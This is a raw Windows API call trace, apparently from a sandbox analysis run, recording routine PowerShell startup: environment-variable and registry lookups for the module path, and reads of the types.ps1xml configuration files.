	[0508.245] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.245] CoTaskMemFree (pv=0x30ac60) 
	[0508.246] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.246] CoTaskMemFree (pv=0x30ac60) 
	[0508.246] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.246] CoTaskMemFree (pv=0x30ac60) 
	[0508.247] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.247] CoTaskMemFree (pv=0x30ac60) 
	[0508.251] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.251] CoTaskMemFree (pv=0x30ac60) 
	[0508.256] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.256] CoTaskMemFree (pv=0x30ac60) 
	[0508.256] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.257] CoTaskMemFree (pv=0x30ac60) 
	[0508.257] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.257] CoTaskMemFree (pv=0x30ac60) 
	[0510.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0511.088] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0511.088] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0511.088] CoTaskMemFree (pv=0x30ac60) 
	[0511.090] CoTaskMemAlloc (cb=0xcc) returned 0x31d840
	[0511.090] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31d840, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0511.689] CoTaskMemFree (pv=0x31d840) 
	[0511.689] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed448 | out: phkResult=0xed448*=0x2d4) returned 0x0
	[0511.689] RegQueryValueExW (in: hKey=0x2d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed3cc, lpData=0x0, lpcbData=0xed3c8*=0x0 | out: lpType=0xed3cc*=0x2, lpData=0x0, lpcbData=0xed3c8*=0x6c) returned 0x0
	[0511.689] CoTaskMemAlloc (cb=0x70) returned 0x2c23f0
	[0511.689] RegQueryValueExW (in: hKey=0x2d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed39c, lpData=0x2c23f0, lpcbData=0xed398*=0x6c | out: lpType=0xed39c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xed398*=0x6c) returned 0x0
	[0511.689] CoTaskMemFree (pv=0x2c23f0) 
	[0511.689] CoTaskMemAlloc (cb=0xcc) returned 0x31d840
	[0511.689] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x31d840, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0511.689] CoTaskMemFree (pv=0x31d840) 
	[0511.689] CoTaskMemAlloc (cb=0xcc) returned 0x31d840
	[0511.689] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31d840, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0511.689] CoTaskMemFree (pv=0x31d840) 
	[0511.693] RegCloseKey (hKey=0x2d4) returned 0x0
	[0511.693] CoTaskMemAlloc (cb=0xcc) returned 0x31d840
	[0511.693] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x31d840, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0511.693] CoTaskMemFree (pv=0x31d840) 
	[0511.693] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xed448 | out: phkResult=0xed448*=0x2d4) returned 0x0
	[0511.693] RegQueryValueExW (in: hKey=0x2d4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xed3cc, lpData=0x0, lpcbData=0xed3c8*=0x0 | out: lpType=0xed3cc*=0x0, lpData=0x0, lpcbData=0xed3c8*=0x0) returned 0x2
	[0511.693] RegCloseKey (hKey=0x2d4) returned 0x0
	[0511.699] CoTaskMemAlloc (cb=0x20c) returned 0x3170c0
	[0511.699] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3170c0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0511.700] CoTaskMemFree (pv=0x3170c0) 
	[0511.700] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0511.701] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0511.710] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0511.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.710] CoTaskMemFree (pv=0x30ac60) 
	[0511.712] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0511.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.712] CoTaskMemFree (pv=0x30ac60) 
	[0511.715] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0511.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.715] CoTaskMemFree (pv=0x30ac60) 
	[0511.715] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0511.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.715] CoTaskMemFree (pv=0x30ac60) 
	[0511.717] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed238 | out: phkResult=0xed238*=0x320) returned 0x0
	[0511.718] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0xed24c, lpData=0x0, lpcbData=0xed248*=0x0 | out: lpType=0xed24c*=0x1, lpData=0x0, lpcbData=0xed248*=0x74) returned 0x0
	[0511.718] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0xed1bc, lpData=0x0, lpcbData=0xed1b8*=0x0 | out: lpType=0xed1bc*=0x1, lpData=0x0, lpcbData=0xed1b8*=0x74) returned 0x0
	[0511.718] CoTaskMemAlloc (cb=0x78) returned 0x2c23f0
	[0511.718] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0xed18c, lpData=0x2c23f0, lpcbData=0xed188*=0x74 | out: lpType=0xed18c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed188*=0x74) returned 0x0
	[0511.718] CoTaskMemFree (pv=0x2c23f0) 
	[0511.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0511.718] SetErrorMode (uMode=0x1) returned 0x1
	[0511.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0511.718] SetErrorMode (uMode=0x1) returned 0x1
	[0511.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0511.720] SetErrorMode (uMode=0x1) returned 0x1
	[0511.720] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0511.720] SetErrorMode (uMode=0x1) returned 0x1
	[0511.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0511.724] SetErrorMode (uMode=0x1) returned 0x1
	[0511.724] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0511.724] SetErrorMode (uMode=0x1) returned 0x1
	[0511.727] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0511.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.728] CoTaskMemFree (pv=0x30ac60) 
	[0512.394] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0512.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.394] CoTaskMemFree (pv=0x30ac60) 
	[0512.397] GetACP () returned 0x4e4
	[0512.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0512.405] SetErrorMode (uMode=0x1) returned 0x1
	[0512.406] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0512.406] GetFileType (hFile=0x324) returned 0x1
	[0512.406] SetErrorMode (uMode=0x1) returned 0x1
	[0512.406] GetFileType (hFile=0x324) returned 0x1
	[0512.407] ReadFile (in: hFile=0x324, lpBuffer=0x2dbbb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2dbbb58*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0512.410] ReadFile (in: hFile=0x324, lpBuffer=0x2dbbb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2dbbb58*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0512.410] ReadFile (in: hFile=0x324, lpBuffer=0x2dbbb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2dbbb58*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0512.411] ReadFile (in: hFile=0x324, lpBuffer=0x2dbbb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2dbbb58*, lpNumberOfBytesRead=0xed048*=0xcf3, lpOverlapped=0x0) returned 1
	[0512.411] ReadFile (in: hFile=0x324, lpBuffer=0x2dbafb3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2dbafb3*, lpNumberOfBytesRead=0xed048*=0x0, lpOverlapped=0x0) returned 1
	[0512.411] ReadFile (in: hFile=0x324, lpBuffer=0x2dbbb58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2dbbb58*, lpNumberOfBytesRead=0xed048*=0x0, lpOverlapped=0x0) returned 1
	[0512.414] CloseHandle (hObject=0x324) returned 1
	[0512.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0512.418] SetErrorMode (uMode=0x1) returned 0x1
	[0512.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0512.419] SetErrorMode (uMode=0x1) returned 0x1
	[0513.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0513.104] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x324) returned 0x0
	[0513.104] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0513.104] CoTaskMemAlloc (cb=0x5a) returned 0x1b8442a0
	[0513.104] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x1b8442a0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0513.104] CoTaskMemFree (pv=0x1b8442a0) 
	[0513.105] RegCloseKey (hKey=0x324) returned 0x0
	[0513.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0513.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0514.338] GetSystemInfo (in: lpSystemInfo=0xebce0 | out: lpSystemInfo=0xebce0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0514.339] VirtualQuery (in: lpAddress=0xebd90, lpBuffer=0xecc50, dwLength=0x30 | out: lpBuffer=0xecc50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0514.356] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0514.356] GetFileType (hFile=0x320) returned 0x1
	[0514.356] SetErrorMode (uMode=0x1) returned 0x1
	[0514.356] GetFileType (hFile=0x320) returned 0x1
	[0514.356] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.357] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.357] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.357] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.357] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.357] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
	[0514.358] ReadFile (in: hFile=0x320, lpBuffer=0x2c920a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed048, lpOverlapped=0x0 | out: lpBuffer=0x2c920a0*, lpNumberOfBytesRead=0xed048*=0x1000, lpOverlapped=0x0) returned 1
